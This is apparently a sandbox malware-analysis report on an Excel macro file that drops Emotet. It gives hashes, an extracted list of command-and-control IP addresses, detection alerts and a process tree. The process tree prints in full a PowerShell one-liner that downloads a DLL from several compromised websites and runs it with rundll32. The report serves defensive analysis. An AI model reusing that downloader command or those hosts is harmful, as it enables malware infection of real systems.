Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
24/11/2021, 17:59
211124-wk8rgsddbm 1022/11/2021, 14:46
211122-r5n6csagd6 1022/11/2021, 14:46
211122-r5csbsfgdp 1022/11/2021, 14:44
211122-r4kfsafgdn 1022/11/2021, 14:41
211122-r2x9vsfgcq 1022/11/2021, 14:20
211122-rneklaffgr 1022/11/2021, 14:15
211122-rkk8zaffgl 1017/11/2021, 06:51
211117-hm1l1aeefm 1017/11/2021, 06:37
211117-hdnk3seedn 10Analysis
-
max time kernel
49s -
max time network
57s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
17/11/2021, 06:51
Static task
static1
General
-
Target
865663204559_17_Nov_2021.xlsm
-
Size
44KB
-
MD5
477fd718bb764ffe3c5afde16c6c8dd2
-
SHA1
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
-
SHA256
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
-
SHA512
f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Malware Config
Extracted
emotet
Epoch4
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
158.69.222.101:443
107.182.225.142:8080
176.104.106.96:8080
81.0.236.90:443
50.116.54.215:443
138.185.72.26:8080
51.68.175.8:8080
210.57.217.132:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3052 3152 cmd.exe 67 -
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 16 IoCs
flow pid Process 33 4744 powershell.exe 41 4744 powershell.exe 43 3788 rundll32.exe 45 3788 rundll32.exe 48 3788 rundll32.exe 51 3788 rundll32.exe 52 3788 rundll32.exe 53 3788 rundll32.exe 54 3788 rundll32.exe 55 3788 rundll32.exe 56 3788 rundll32.exe 57 3788 rundll32.exe 58 3788 rundll32.exe 59 3788 rundll32.exe 60 3788 rundll32.exe 61 3788 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 4336 rundll32.exe 3768 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Vhhcsaycitojwot\zymfkff.jad rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3152 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4744 powershell.exe 4744 powershell.exe 4744 powershell.exe 3788 rundll32.exe 3788 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4744 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3152 wrote to memory of 3052 3152 EXCEL.EXE 71 PID 3152 wrote to memory of 3052 3152 EXCEL.EXE 71 PID 3052 wrote to memory of 4744 3052 cmd.exe 73 PID 3052 wrote to memory of 4744 3052 cmd.exe 73 PID 4744 wrote to memory of 4336 4744 powershell.exe 74 PID 4744 wrote to memory of 4336 4744 powershell.exe 74 PID 4744 wrote to memory of 4336 4744 powershell.exe 74 PID 4336 wrote to memory of 3768 4336 rundll32.exe 75 PID 4336 wrote to memory of 3768 4336 rundll32.exe 75 PID 4336 wrote to memory of 3768 4336 rundll32.exe 75 PID 3768 wrote to memory of 1220 3768 rundll32.exe 76 PID 3768 wrote to memory of 1220 3768 rundll32.exe 76 PID 3768 wrote to memory of 1220 3768 rundll32.exe 76 PID 1220 wrote to memory of 3788 1220 rundll32.exe 77 PID 1220 wrote to memory of 3788 1220 rundll32.exe 77 PID 1220 wrote to memory of 3788 1220 rundll32.exe 77
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWow64\rundll32.exe"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\37926850.dll,f15417631504⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\37926850.dll",Control_RunDLL5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vhhcsaycitojwot\zymfkff.jad",bgoHsrDVNbITvy6⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vhhcsaycitojwot\zymfkff.jad",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3788
-
-
-
-
-
-